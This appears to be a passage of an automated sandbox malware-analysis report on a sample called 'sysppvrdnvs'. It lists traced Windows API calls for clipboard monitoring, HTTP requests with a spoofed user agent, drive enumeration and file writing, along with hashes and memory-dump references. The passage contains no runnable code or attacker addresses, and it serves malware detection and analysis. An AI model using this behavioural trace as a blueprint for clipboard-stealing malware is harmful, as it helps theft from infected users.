                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                              • String ID: PCOI$ilci
                                                                                                                                                                                              • API String ID: 3345448188-3762367603
                                                                                                                                                                                              • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                              • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040EF98
                                                                                                                                                                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                              • API String ID: 2761394606-2217117414
                                                                                                                                                                                              • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                              • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                              • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                              • String ID: PCOI$ilci$.#v
                                                                                                                                                                                              • API String ID: 2403999931-387814812
                                                                                                                                                                                              • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                              • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                              • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 697 4059b0-4059d2 GetWindowLongW 698 4059d4-4059db 697->698 699 4059f6-4059fd 697->699 700 4059e1-4059e5 698->700 701 405a67-405a78 IsClipboardFormatAvailable 698->701 702 405a26-405a2c 699->702 703 4059ff 699->703 709 405a04-405a21 SetClipboardViewer SetWindowLongW 700->709 710 4059e7-4059eb 700->710 707 405a83-405a8d IsClipboardFormatAvailable 701->707 708 405a7a-405a81 701->708 705 405a46-405a4a 702->705 706 405a2e-405a44 SetWindowLongW 702->706 704 405be4-405bfd DefWindowProcA 703->704 711 405a62 705->711 712 405a4c-405a5c SendMessageA 705->712 706->711 714 405a98-405aa2 IsClipboardFormatAvailable 707->714 715 405a8f-405a96 707->715 713 405aab-405aaf 708->713 709->704 716 4059f1 710->716 717 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 710->717 711->704 712->711 719 405ab5-405abf OpenClipboard 713->719 720 405b7f-405b83 713->720 714->713 718 405aa4 714->718 715->713 716->704 717->704 718->713 719->720 723 405ac5-405ad6 GetClipboardData 719->723 721 405b85-405b95 SendMessageA 720->721 722 405b9b 720->722 721->722 722->704 724 405ad8 723->724 725 405add-405aee GlobalLock 723->725 724->704 726 405af0 725->726 727 405af5-405b06 725->727 726->704 728 405b08-405b0c 727->728 729 405b29-405b3c call 40d250 727->729 730 405b3e-405b4e call 4057f0 728->730 731 405b0e-405b12 728->731 737 405b51-405b65 GlobalUnlock CloseClipboard 729->737 730->737 733 405b14 731->733 734 405b16-405b27 call 405680 731->734 733->737 734->737 737->720 740 405b67-405b7c call 404970 call 40ab60 737->740 740->720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                                                                              • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                                                                              • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                                                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                                                                              • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                                                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3549449529-0
                                                                                                                                                                                              • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                              • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 004058D8
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00405926
                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                              • String ID: %x%X$0
                                                                                                                                                                                              • API String ID: 716646876-225668902
                                                                                                                                                                                              • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                              • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 767 40e640-40e6db memset InternetCrackUrlA InternetOpenA 768 40e6e1-40e714 InternetConnectA 767->768 769 40e857-40e860 767->769 770 40e84a-40e851 InternetCloseHandle 768->770 771 40e71a-40e74a HttpOpenRequestA 768->771 770->769 772 40e750-40e767 HttpSendRequestA 771->772 773 40e83d-40e844 InternetCloseHandle 771->773 774 40e830-40e837 InternetCloseHandle 772->774 775 40e76d-40e771 772->775 773->770 774->773 776 40e826 775->776 777 40e777 775->777 776->774 778 40e781-40e788 777->778 779 40e819-40e824 778->779 780 40e78e-40e7b0 InternetReadFile 778->780 779->774 781 40e7b2-40e7b9 780->781 782 40e7bb 780->782 781->782 783 40e7bd-40e814 call 40a990 memcpy 781->783 782->779 783->778
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 0040E668
                                                                                                                                                                                              • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                              • String ID: <$GET
                                                                                                                                                                                              • API String ID: 1205665004-427699995
                                                                                                                                                                                              • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                              • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                              • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                                                                                • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                                                                                • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                                                                                • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00407072
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00407092
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004070B5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                              • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                              • API String ID: 1650488544-2117135753
                                                                                                                                                                                              • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                              • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                              • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                                                                              • memcmp.NTDLL ref: 0040F35D
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3902698870-507759092
                                                                                                                                                                                              • Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                              • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3862671961-0
                                                                                                                                                                                              • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                              • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                                                                              • CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                                                                                • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000012.00000002.2492009237.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000012.00000002.2491992466.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492028868.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000012.00000002.2492052130.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 439099756-507759092
